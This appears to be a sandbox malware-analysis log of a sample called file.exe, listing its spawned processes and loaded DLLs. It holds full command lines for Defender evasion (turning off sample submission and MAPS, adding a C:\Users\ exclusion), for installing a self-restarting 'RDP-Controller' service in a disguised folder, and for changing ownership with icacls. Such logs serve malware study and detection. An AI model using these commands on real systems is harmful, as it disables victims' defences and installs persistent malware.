Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe

File read: C:\Users\user\AppData\Local\Temp\wfpblk.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7mmwpep245voy3fngkym99px3pj5vx36.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe "C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe "C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe"
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	Process created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Source: C:\Windows\System32\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	Process created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	Process created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	Process created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl
Source: C:\Windows\System32\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 2656 -ip 2656
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2656 -s 1188
Source: unknown	Process created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7mmwpep245voy3fngkym99px3pj5vx36.bat"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe "C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe "C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	Process created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	Process created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	Process created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	Process created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 2656 -ip 2656
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2656 -s 1188
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: ntmarta.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: zlib1.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
